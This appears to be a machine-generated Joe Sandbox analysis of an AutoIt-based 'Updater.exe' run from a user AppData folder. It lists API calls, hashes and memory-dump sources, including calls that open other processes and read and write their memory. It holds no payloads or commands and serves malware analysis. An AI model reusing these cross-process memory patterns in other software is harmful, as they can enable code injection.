                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                    • Opcode ID: 0dd676fdd157db6b14f28eb217c79b96d7fed8bda40874c2e90ce3ddf22ba927
                                                                                                                                                    • Instruction ID: 9e6e510dee1b9799f38ca3fdcb3344f02e5c1c0b2e842571671a10fb79fca9db
                                                                                                                                                    • Opcode Fuzzy Hash: 0dd676fdd157db6b14f28eb217c79b96d7fed8bda40874c2e90ce3ddf22ba927
                                                                                                                                                    • Instruction Fuzzy Hash: B2012D75C0161ADBDF00AFE9EC48AEDBBB8FB09711F0046A6E501B3160DF789554CBA1
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B8221E
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00B81CA1,?,?,?), ref: 00B8222A
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B81CA1,?,?,?), ref: 00B82239
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B81CA1,?,?,?), ref: 00B82240
                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B82257
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                    • Opcode ID: b8c3a40a71643574b5daefcebb39267a8733a488f62c18a3e39c67dbefb8f2f6
                                                                                                                                                    • Instruction ID: 55721d66fc54682a173f1efe836e38da6c01eab8fc5962546861e5b3a516344d
                                                                                                                                                    • Opcode Fuzzy Hash: b8c3a40a71643574b5daefcebb39267a8733a488f62c18a3e39c67dbefb8f2f6
                                                                                                                                                    • Instruction Fuzzy Hash: D0018CB5600205BFDB115FA9DC48E6A3BAEEF89360B2141A8FD49D3360EE75DC40CB60
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B82134
                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B82140
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B8214F
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B82156
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B8216C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                    • Opcode ID: 973f6dc1d4c32ec88c6ba942bac599ca9d42d989f777460fead80d3ccf50d479
                                                                                                                                                    • Instruction ID: 273880791c6a61f5150be83a13a07be1ed0b624a880fefc2c8f92c733bb10ba2
                                                                                                                                                    • Opcode Fuzzy Hash: 973f6dc1d4c32ec88c6ba942bac599ca9d42d989f777460fead80d3ccf50d479
                                                                                                                                                    • Instruction Fuzzy Hash: 57F04FB5100301AFD7122FA4EC5DF563BADEF89760F200514FB45E7260DEB4D800CA60
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B86C3D
                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B86C54
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00B86C6C
                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00B86C88
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B86CA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                    • Opcode ID: 97b16d23bb4f8a0505b0b345ecef730891225142bf1840bad5c5b51558d65965
                                                                                                                                                    • Instruction ID: e64edc6fa8948121a921691c453cc47da10967db4d00df3c716ce2111a6e4d84
                                                                                                                                                    • Opcode Fuzzy Hash: 97b16d23bb4f8a0505b0b345ecef730891225142bf1840bad5c5b51558d65965
                                                                                                                                                    • Instruction Fuzzy Hash: F8016230500308ABEB246F65ED4EBA677B8FB00706F0007A9B586A20E1EBE46954CF91
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B91182
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B9118F
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B9119C
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B911A9
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B911B6
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B911C3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                    • Opcode ID: ce099d6a8313506228a84157b34ffec94bb3e58cd9eaa34600a7af5176ae2c16
                                                                                                                                                    • Instruction ID: 2e4309e5c5ba6285fdcdf8ed53de26ce746bf20be2fc30d2c33a4fdd3307fd17
                                                                                                                                                    • Opcode Fuzzy Hash: ce099d6a8313506228a84157b34ffec94bb3e58cd9eaa34600a7af5176ae2c16
                                                                                                                                                    • Instruction Fuzzy Hash: 32019071801B26AFCB309F6AD880412FAF5EE502153158E7ED29662921C7B0A945DE80
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 00B5D582
                                                                                                                                                      • Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A
                                                                                                                                                    • _free.LIBCMT ref: 00B5D594
                                                                                                                                                    • _free.LIBCMT ref: 00B5D5A6
                                                                                                                                                    • _free.LIBCMT ref: 00B5D5B8
                                                                                                                                                    • _free.LIBCMT ref: 00B5D5CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2929853658-0
                                                                                                                                                    • Opcode ID: 3d0eed0e48c8f67ebe80d33620f83470b05407f2e6329a957b81ba5eeb15542e
                                                                                                                                                    • Instruction ID: dee1d823379521bf492dce5e7de9b858de2532aec5a0526e514c2dff615b2ee7
                                                                                                                                                    • Opcode Fuzzy Hash: 3d0eed0e48c8f67ebe80d33620f83470b05407f2e6329a957b81ba5eeb15542e
                                                                                                                                                    • Instruction Fuzzy Hash: 35F06D32509284AB8634EB5CF8C2E1A77EDEA14312B6809C5F909DB541DF70FD84CA60
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B84B7D
                                                                                                                                                    • GetParent.USER32 ref: 00B84B84
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B84B91
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00B84BA7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongWindow$Parent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2125864951-0
                                                                                                                                                    • Opcode ID: 7b778ed9f907b6c7b397e90ade3a3c8f6762da9ca1588db06340315a2274632a
                                                                                                                                                    • Instruction ID: e01d9bfa125dc0c6f85800161acb1226e0b4fd30e2917cba1083a2d50f6dc102
                                                                                                                                                    • Opcode Fuzzy Hash: 7b778ed9f907b6c7b397e90ade3a3c8f6762da9ca1588db06340315a2274632a
                                                                                                                                                    • Instruction Fuzzy Hash: C3E06D32209133A75A1136296C00FAA76DC5E5277472203A1F821F31F4EB99E80286A8
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 00B520E2
                                                                                                                                                      • Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A
                                                                                                                                                    • _free.LIBCMT ref: 00B520F4
                                                                                                                                                    • _free.LIBCMT ref: 00B52107
                                                                                                                                                    • _free.LIBCMT ref: 00B52118
                                                                                                                                                    • _free.LIBCMT ref: 00B52129
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2929853658-0
                                                                                                                                                    • Opcode ID: f2c9bf31f408979f16348a49e124eb0779256c6551f3a6e342bf1a5a3d12667b
                                                                                                                                                    • Instruction ID: 72b94d04c6e0f1d13e9102bcf747c12bb172b0b1b7f27dfc7b1f9cc08879596c
                                                                                                                                                    • Opcode Fuzzy Hash: f2c9bf31f408979f16348a49e124eb0779256c6551f3a6e342bf1a5a3d12667b
                                                                                                                                                    • Instruction Fuzzy Hash: D5F03A708071A1CFC616AF18BC816297BE4FB0A76174809CAF9109B2B4CF790D05DF81
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __freea$_free
                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                                    • Opcode ID: 2b7d813eae74714a81927fd909144328ddf540ab6ff1afdf6d84dbabd06fbd3e
                                                                                                                                                    • Instruction ID: 93d464ededcb304eab7405b4b04971d8f90151da8337bc2c535886a7f111d1ac
                                                                                                                                                    • Opcode Fuzzy Hash: 2b7d813eae74714a81927fd909144328ddf540ab6ff1afdf6d84dbabd06fbd3e
                                                                                                                                                    • Instruction Fuzzy Hash: A3D10531910606DADB249F6CC8957FAB7F0EF05702F2849DAEE15BB290D3759D88CB90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B8C259: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B83287,?,?,00000034,00000800,?,00000034), ref: 00B8C283
                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B83839
                                                                                                                                                      • Part of subcall function 00B8C224: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B832B6,?,?,00000800,?,00001073,00000000,?,?), ref: 00B8C24E
                                                                                                                                                      • Part of subcall function 00B8C17E: GetWindowThreadProcessId.USER32(?,?), ref: 00B8C1A9
                                                                                                                                                      • Part of subcall function 00B8C17E: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B8324B,00000034,?,?,00001004,00000000,00000000), ref: 00B8C1B9
                                                                                                                                                      • Part of subcall function 00B8C17E: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B8324B,00000034,?,?,00001004,00000000,00000000), ref: 00B8C1CF
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B838A6
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B838F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                    • Opcode ID: b8e67a03960a4025d1e26d066f21252bc72cd27f7d58c0211529561c141465d2
                                                                                                                                                    • Instruction ID: 4c068119aac95f6caf549190bb1d10ed2468d38e71f4409d7dd105e49fa45f2c
                                                                                                                                                    • Opcode Fuzzy Hash: b8e67a03960a4025d1e26d066f21252bc72cd27f7d58c0211529561c141465d2
                                                                                                                                                    • Instruction Fuzzy Hash: 8B415AB6A00219AFCB10EFA4CC85ADEBBF8EF49700F104195FA55B7191DA716E45CBA0
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B77F96
                                                                                                                                                      • Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B338A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                    • String ID: Line %d: $AutoIt -
                                                                                                                                                    • API String ID: 2289894680-4094128768
                                                                                                                                                    • Opcode ID: 4ed20de9a2deab62ecb52be66f836b19988a8f42aa2af9e8e347b31b265c8ce3
                                                                                                                                                    • Instruction ID: 06f5157222dca6b52f61892318872f69807c392e4e7427a50a84da0c1a439edb
                                                                                                                                                    • Opcode Fuzzy Hash: 4ed20de9a2deab62ecb52be66f836b19988a8f42aa2af9e8e347b31b265c8ce3
                                                                                                                                                    • Instruction Fuzzy Hash: AD41D371008311AFD311EB60EC85AEF77E8AF44720F104ABAF599930A1EF749A48C796
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\hangbird\Updater.exe,00000104), ref: 00B5158A
                                                                                                                                                    • _free.LIBCMT ref: 00B51655
                                                                                                                                                    • _free.LIBCMT ref: 00B5165F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\hangbird\Updater.exe
                                                                                                                                                    • API String ID: 2506810119-2147348206
                                                                                                                                                    • Opcode ID: 4a3152e046468ca317780240eedad41e7cc4e84428e2506ff3b555aa4237cbec
                                                                                                                                                    • Instruction ID: 9f4f6ac524f8338c0644290a5567d1d875fd07432ed04bd7098374104b2c39ae
                                                                                                                                                    • Opcode Fuzzy Hash: 4a3152e046468ca317780240eedad41e7cc4e84428e2506ff3b555aa4237cbec
                                                                                                                                                    • Instruction Fuzzy Hash: 963172B1A01258EFDB21DF9DD885FAEBBFCEB85311B1444E6EC0597211EA708E48CB50
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 00B8D0A0
                                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00B8D0E6
                                                                                                                                                    • DeleteMenu.USER32(00B8CBE8,?,00000000,00B8CBE8,00000000,00000000,?,00000000), ref: 00B8D12F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                                    • Opcode ID: cffc840faa4c8fea70ac7945620bb47b815e4e7a4c05c7cd5301ec925cab53d7
                                                                                                                                                    • Instruction ID: ff06b6a15d9c0f1d45f08d846605ee657beff4a91ceb252b2a6dd26a02f5f94b
                                                                                                                                                    • Opcode Fuzzy Hash: cffc840faa4c8fea70ac7945620bb47b815e4e7a4c05c7cd5301ec925cab53d7
                                                                                                                                                    • Instruction Fuzzy Hash: 6441C3702043029FD720EF24C885F5ABBE4EF85314F04469EF465A72E1D774E904CB62
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BBD938,00000000,?,?,?,?), ref: 00BB4E70
                                                                                                                                                    • GetWindowLongW.USER32 ref: 00BB4E8D
                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BB4E9D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                    • Opcode ID: d0f8a603dc330408bc77e983a8bb44d58f72805e82a80d64bc14b105d41df74f
                                                                                                                                                    • Instruction ID: ab7c42b2010a61a86f747787ab70c6b4d1eeff2d90eed3ac7fc3b7563c654b6f
                                                                                                                                                    • Opcode Fuzzy Hash: d0f8a603dc330408bc77e983a8bb44d58f72805e82a80d64bc14b105d41df74f
                                                                                                                                                    • Instruction Fuzzy Hash: 8E316D31200609AFDB258F38CC45BEA7BE9FB18324F204365F979932E1DBB4E8518B50
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
